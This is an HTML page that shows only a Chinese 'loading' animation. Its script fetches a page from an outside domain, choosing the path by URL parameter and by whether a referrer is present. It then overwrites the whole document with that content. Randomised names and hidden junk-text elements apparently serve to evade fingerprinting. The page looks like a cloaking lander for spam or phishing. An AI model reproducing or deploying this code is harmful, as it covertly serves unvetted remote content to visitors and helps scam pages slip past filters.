<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OGW8QBvBa9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OGW8QBvBa9 .vqo0e5ukE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OGW8QBvBa9 .content {
            line-height: 50px;
            text-align: center
        }

        .OGW8QBvBa9 .img {
            width: 100%
        }

        .OGW8QBvBa9 .pnGscRr8 {
            text-align: center
        }

        .OGW8QBvBa9 .pnGscRr8 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OGW8QBvBa9 .pnGscRr8 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OGW8QBvBa9 .pnGscRr8 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OGW8QBvBa9 .pnGscRr8 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OGW8QBvBa9 .pnGscRr8 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OGW8QBvBa9 .pnGscRr8 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OGW8QBvBa9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RdewZgF77bAmr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WpDGa = RdewZgF77bAmr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WpDGa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WpDGa +".html?a=share";
		}
		
        dQLrpUS=url+"#"+new Date().getTime();
        dQLrpUS && function() {
            $.get(dQLrpUS, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>am0GOgA82m2iYBwvIZhW5XpKaRSr8AlPBpKUfikpneXJVXY6wpxD9OOpc8MbMvKrHSid7spZc6ew</p>
<span style='display:none'>BXQvun8o8wihQQiJ12NEiAvxsWihQ8BjqJy86hIRx9rY2c9J3nZ8CBxNTUjYJSe2Qf03R</span>
<li style='display:none' >zAXGqgDmI0u1qM2ttdTZqaGAwpP6EVnefAKmIV</li><div class="OGW8QBvBa9">
    <div class="vqo0e5ukE">
        <div class="pnGscRr8">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>HCNlWY3PEN7SQn6YgPWxC56VSnM4JMoWdq7N8JGtGUSnhIR9o8fKKHGqKXdcAUf</div>
<img  src='' style='display:none'>
<li style='display:none' >PRGYCsfmrjxJZWo8TMwUQSD7g49SY5ykbChKE1rPptaLpj3Jxe5zYz02aKq2GB4XIBcapbC7d</li>
<p  style='display:none'>Cid6yRTfpH8aHjcd0qWXLTJCbWPol09ofMTC5QoWI8qqjia</p>
<p  style='display:none'>Cid6yRTfpH8aHjcd0qWXLTJCbWPol09ofMTC5QoWI8qqjia</p>
<b style='display:none' >SiZza1m8cUDnrflEV60y24HGW3myiO1e5fD01Jx3XoKRZe92yM6KAC2o1ULDeNIRIMLOvbcVj</b>
<li style='display:none' >PRGYCsfmrjxJZWo8TMwUQSD7g49SY5ykbChKE1rPptaLpj3Jxe5zYz02aKq2GB4XIBcapbC7d</li>
<h1 style='display:none' >kZ7lrwMSJGm5FyfB8zApCen1YsckEMswSeMu9QZJkIblF6s4wmHEPVNaQI9yL6mD5k1nPobOxezsKS7iEar0Y0RkTVBvwnQ</h1>
<img  src='' style='display:none'>
<b style='display:none' >SiZza1m8cUDnrflEV60y24HGW3myiO1e5fD01Jx3XoKRZe92yM6KAC2o1ULDeNIRIMLOvbcVj</b></body>
</html>